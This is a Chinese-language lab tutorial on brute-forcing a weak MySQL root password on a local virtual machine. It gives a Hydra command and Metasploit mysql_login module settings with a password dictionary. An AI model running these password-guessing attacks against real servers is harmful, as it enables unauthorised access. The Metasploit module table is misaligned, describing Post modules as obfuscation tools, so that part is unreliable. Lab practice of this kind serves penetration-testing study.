mysql 弱口令暴力破解本地滲透測試


環境配置

主機

靶機: 本地Linux服務器虛擬機 + phpstudy

攻擊主機:本地 Kali 虛擬機

配置好網絡讓主機之間相互可以通信

數據庫

數據庫版本:mysql 5.5.62

  1. 開啟 mysql 遠程連接 ,否則攻擊主機無法建立與靶機數據庫連接

    我是直接在小皮面板中開啟

  2. 修改 mysql 最大錯誤連接數量,默認為 100 ,改為 1000, 方便暴力破解

使用 Hydra 工具進行暴力破解

kali 自帶的 hydra 工具是一款非常強大的暴力破解工具

  1. 直接輸入hydra 查看一下 hydra 的命令

    -l 小寫 指定用戶名
    -L 大寫 指定用戶名字典
    -p 小寫 指定密碼
    -P 大寫 指定密碼字典
    -C 指定用戶名:密碼 字典
    -M 指定目標ip列表文件
    -t 同時運行的線程數
    
  2. 使用 hydra 指定密碼字典和 mysql 服務進行攻擊,可以看到爆破成功

    hydra -l root -P '密碼字典文件目錄' 目標ip mysql
    

使用 metsploit 暴力破解

Metasploit是一種安全框架,為滲透測試工程師提供了大量滲透模塊和掃描模塊

基本模塊

基本模塊名 功能
Auxiliary(輔助模塊) 包含掃描、fuzz測試、拒絕服務攻擊、網絡協議欺騙等程序
Exploits(攻擊模塊) 是一段程序,運行時會利用目標的安全漏洞進行安全測試
Payload(攻擊載荷模塊) 在成功對目標完成一次滲透測試,payload將在目標機器運行,幫助我們獲取目標上需要的訪問和運行權限
Post(后滲透模塊) 通常用來對代碼進行混淆,繞過安全保護機制的檢驗
Encoders(編碼模塊)

基本命令

命令名 作用
use [Auxiliary/Exploit/Payload/Encoder] 選擇一個指定的模塊並使其開始工作
show [exploits/payload/encoder/auxiliary/option] 顯示可用的特定功能的模塊
set [options/payload] 給某個特定對象賦值
setg [options/payload] 給某個對象賦值的同時設定作用域為全局,在模塊進行切換的時候,該對象的值不會被改變
Run 在設置一個輔助模塊需要的所有選項之后,啟動該輔助模塊
exploit 啟動一個滲透模塊
back 取消當前選擇的模塊並且退回到上一級命令窗口
Info 列出相關模塊的信息
Search 搜索符合條件的特定模塊
Session 列出當前可用的會話
use auxiliary/scanner/mysql/mysql_login //使用 mysql 暴力破解模塊
set rhosts 192.168.183.134   			//設置目標 ip
set username root						//設置用戶名
set pass_file /home/zyw/桌面/FastPwds.txt	//指定字典
run										//開始爆破

爆破成功


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM